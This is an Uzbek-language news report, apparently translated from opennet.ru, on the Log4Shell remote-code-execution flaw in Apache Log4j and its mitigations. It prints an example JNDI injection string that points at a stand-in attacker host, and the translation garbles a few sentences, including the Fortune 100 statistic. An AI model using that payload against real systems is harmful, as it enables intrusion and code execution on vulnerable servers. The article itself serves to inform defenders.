Java ilovalarida tizimga kirishni tashkil qilish uchun mashhur Apache Log4j tizimida “{jndi:URL}” formatidagi maxsus formatlangan qiymat jurnalga yozilganda ixtiyoriy kodni bajarish imkonini beruvchi muhim zaiflik aniqlandi. Hujum tashqi manbalardan olingan qiymatlarni qayd qiluvchi Java ilovalarida, masalan, xato xabarlarida muammoli qiymatlarni ko'rsatishda amalga oshirilishi mumkin.
Ta'kidlanishicha, Apache Struts, Apache Solr, Apache Druid yoki Apache Flink kabi ramkalardan foydalanadigan deyarli barcha loyihalar, jumladan Steam, Apple iCloud, Minecraft mijozlari va serverlari muammoga ta'sir qiladi. Kutilishicha, zaiflik korporativ ilovalarga ommaviy hujumlar to'lqiniga olib kelishi mumkin, bu esa, taxminiy hisob-kitoblarga ko'ra, Fortune-ning 65 foizi tomonidan veb-ilovalarda qo'llaniladigan Apache Struts tizimidagi muhim zaifliklar tarixini takrorlaydi. 100 ta kompaniya, shu jumladan tarmoqni zaif tizimlar uchun skanerlash urinishlari.
Ishchi ekspluatatsiya allaqachon nashr etilgan, ammo barqaror filiallar uchun tuzatishlar hali tuzilmaganligi muammoni yanada kuchaytiradi. CVE identifikatori hali tayinlanmagan. Tuzatish faqat log4j-2.15.0-rc1 test tarmog'iga kiritilgan. Zaiflikni blokirovka qilish uchun vaqtinchalik yechim sifatida log4j2.formatMsgNoLookups parametrini rostga o'rnatish tavsiya etiladi.
Muammo log4j JNDI (Java nomlash va katalog interfeysi) so'rovlarini bajarish mumkin bo'lgan jurnalga chiqadigan satrlarda "{}" maxsus niqoblarini qayta ishlashni qo'llab-quvvatlashi bilan bog'liq edi. Hujum “${jndi:ldap://attacker.com/a}” oʻrnini bosuvchi satrni oʻtkazish bilan yakunlanadi, uni qayta ishlashdan soʻng log4j Java sinfiga yoʻl uchun LDAP soʻrovini attacker.com serveriga yuboradi. . Buzg'unchi serveri tomonidan qaytarilgan yo'l (masalan, http://second-stage.attacker.com/Exploit.class) joriy jarayon kontekstida yuklanadi va bajariladi, bu esa tajovuzkorga o'zboshimchalik bilan kodni ishga tushirish imkonini beradi. joriy dastur huquqlariga ega tizim.
1-ilova: Zaiflikka CVE-2021-44228 identifikatori tayinlangan.
2-qo'shimcha: log4j-2.15.0-rc1 nashri tomonidan qo'shilgan himoyani chetlab o'tish usuli aniqlandi. Zaiflikdan to'liqroq himoyalangan log4j-2.15.0-rc2 yangi yangilanishi taklif qilindi. Kod noto'g'ri formatlangan JNDI URL manzilidan foydalanganda g'ayritabiiy tugatishning yo'qligi bilan bog'liq o'zgarishlarni ta'kidlaydi.
Manba: opennet.ru